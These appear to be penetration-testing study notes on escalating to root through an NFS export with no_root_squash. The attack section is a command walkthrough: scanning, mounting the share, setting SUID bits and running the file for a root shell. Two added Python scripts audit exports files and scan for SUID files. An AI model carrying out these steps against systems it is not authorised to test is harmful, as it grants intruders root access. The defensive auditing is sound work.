Exploiting NFS
Requirements
The nfs-common package (providing showmount and mount.nfs) must be installed on the attacking machine
Steps
# Nmap scan to find the NFS port (2049 by default); be careful, this full-port scan is NOISY and can take a long time
nmap -T5 -vv -p- IP
# List the NFS shares the server exports
/sbin/showmount -e IP
# Mount the NFS share (the mount point must exist; nolock is passed as a -o option)
mkdir -p /tmp/mount
sudo mount -t nfs -o nolock IP:share /tmp/mount
# Set the SUID/SGID bits on the executable (with no_root_squash, files you create as root stay root-owned)
chmod +s [filename]
# Make sure the file is executable
chmod +x [filename]
# SSH into the target machine and run the executable; for bash, -p stops it dropping the effective UID, so you get a root shell
./[filename] -p
What is root_squash?
By default, root squashing is enabled on NFS shares; this prevents anyone connecting to the NFS share from having root access to the NFS volume
Remote root users are mapped to the user "nfsnobody" when connected, which has minimal local privileges
If it is turned off (no_root_squash), remote root can create root-owned SUID files on the export, giving a remote user root access to any system that mounts it
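The server-side setting that decides this lives in /etc/exports. The following is an added example (not part of the original notes) that parses the exports(5) format and reports each client entry whose effective options disable root squashing, which is what a defender would audit. The sample exports file is constructed inline; the paths and hosts in it are made up.

```python
"""Audit an exports(5) file for NFS shares that disable root squashing.

Added example, not from the original notes. Parses "/path client(opts) ..."
lines and reports entries whose effective options include no_root_squash,
plus whether the entry is exported world-wide and writable.
"""
import re
from dataclasses import dataclass, field

# Constructed sample /etc/exports (hypothetical hosts and paths).
SAMPLE_EXPORTS = """\
# shared home directories
/srv/home        10.0.0.0/24(rw,sync,no_root_squash)
/srv/public      *(ro,sync)
/srv/backup      backup.example.internal(rw,sync,no_subtree_check)
/srv/build       *(rw,no_root_squash,insecure)
# the space before the parenthesis is a classic exports(5) pitfall:
# "host (opts)" exports to host with defaults AND to everyone with opts
/srv/oops        10.0.0.5 (rw,no_root_squash)
"""


@dataclass
class ExportEntry:
    path: str
    client: str
    options: list[str] = field(default_factory=list)

    @property
    def root_squash(self) -> bool:
        # nfs-utils defaults to root_squash; the last option wins.
        squash = True
        for opt in self.options:
            if opt == "no_root_squash":
                squash = False
            elif opt in ("root_squash", "all_squash"):
                squash = True
        return squash

    @property
    def writable(self) -> bool:
        rw = False  # default is ro
        for opt in self.options:
            if opt == "rw":
                rw = True
            elif opt == "ro":
                rw = False
        return rw

    @property
    def world(self) -> bool:
        return self.client == "*"


def parse_exports(text: str) -> list[ExportEntry]:
    """Return one ExportEntry per (path, client) pair in the file."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        tokens = line.split()
        path, specs = tokens[0], tokens[1:]
        if not specs:  # a bare path is exported to everyone with defaults
            entries.append(ExportEntry(path, "*"))
            continue
        for spec in specs:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            client, opts = m.group(1), m.group(2)
            # A token that is only "(opts)" (after "host ") applies to "*".
            client = client or "*"
            options = [o for o in opts.split(",") if o] if opts else []
            entries.append(ExportEntry(path, client, options))
    return entries


def risk(e: ExportEntry) -> str:
    """Rank an entry: no_root_squash is the finding, world+rw makes it worse."""
    if not e.root_squash:
        return "critical" if (e.world and e.writable) else "high"
    if e.world and e.writable:
        return "medium"
    return "ok"


def find_no_root_squash(text: str) -> list[ExportEntry]:
    return [e for e in parse_exports(text) if not e.root_squash]


if __name__ == "__main__":
    for e in parse_exports(SAMPLE_EXPORTS):
        print(f"{risk(e):8} {e.path:14} {e.client:24} {','.join(e.options) or '(defaults)'}")
```

Run it against a real file with `parse_exports(open("/etc/exports").read())`; the fix for any "high" or "critical" line is to drop no_root_squash (or use all_squash) and to replace `*` with the client list that actually needs the share.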
What are files with the SUID bit set?
A file with the SUID (or SGID) bit set runs with the privileges of its owner (or group) rather than of the user who launches it; when the owner is root, that means as the superuser
This can be leveraged to get a shell with those superuser privileges
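The defender-side counterpart is to look for such files on the export and to check how the client mounted it. The following is an added example (not part of the original notes) that lists SUID/SGID regular files under a directory, ranks root-owned SUID executables highest, and parses /proc/mounts-style text to tell whether a mount point carries the nosuid option, which makes the kernel ignore those bits. The mounts sample is constructed; the mount points in it are hypothetical.

```python
"""Find setuid/setgid files under a directory and check mount options.

Added example, not from the original notes. scan_tree() walks a path such
as a mounted NFS export; mount_has_nosuid() reads /proc/mounts-style text.
"""
import os
import stat

# Constructed /proc/mounts sample (device mountpoint fstype options dump pass).
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
10.0.0.7:/srv/home /mnt/home nfs4 rw,nosuid,nodev,relatime,vers=4.2 0 0
10.0.0.7:/srv/build /mnt/build nfs4 rw,relatime,vers=4.2 0 0
"""


def classify(path, mode, uid):
    """Describe a file's special bits; return None if neither bit is set."""
    suid = bool(mode & stat.S_ISUID)
    sgid = bool(mode & stat.S_ISGID)
    if not (suid or sgid):
        return None
    executable = bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
    root_owned = uid == 0
    if suid and root_owned and executable:
        severity = "critical"  # runs as root for anyone who can execute it
    elif suid and executable:
        severity = "medium"    # runs as some other user
    else:
        severity = "low"       # sgid only, or bit set on a non-executable
    return {"path": path, "suid": suid, "sgid": sgid, "uid": uid,
            "executable": executable, "root_owned": root_owned,
            "severity": severity}


def scan_tree(root):
    """Return classify() records for every SUID/SGID regular file under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            rec = classify(p, st.st_mode, st.st_uid)
            if rec:
                findings.append(rec)
    return findings


def mount_has_nosuid(mountpoint, mounts_text):
    """True if mountpoint appears in mounts_text with the nosuid option.

    Returns None if the mount point is not listed at all.
    """
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] == mountpoint:
            return "nosuid" in fields[3].split(",")
    return None


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    with open("/proc/mounts") as fh:
        print("nosuid on", target, "->", mount_has_nosuid(target, fh.read()))
    for rec in scan_tree(target):
        print(rec["severity"], rec["path"], "uid", rec["uid"])
```

Mounting untrusted exports with `nosuid` (and `nodev`) on the client removes the payoff of a root-owned SUID file even when the server side is misconfigured; the scan above then serves as a detection, not just a cleanup list.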
Method
You can upload files to the NFS share and set the permissions (SUID bit) on them from the attacking machine
Then log in through SSH and execute the file on the target to gain a root shell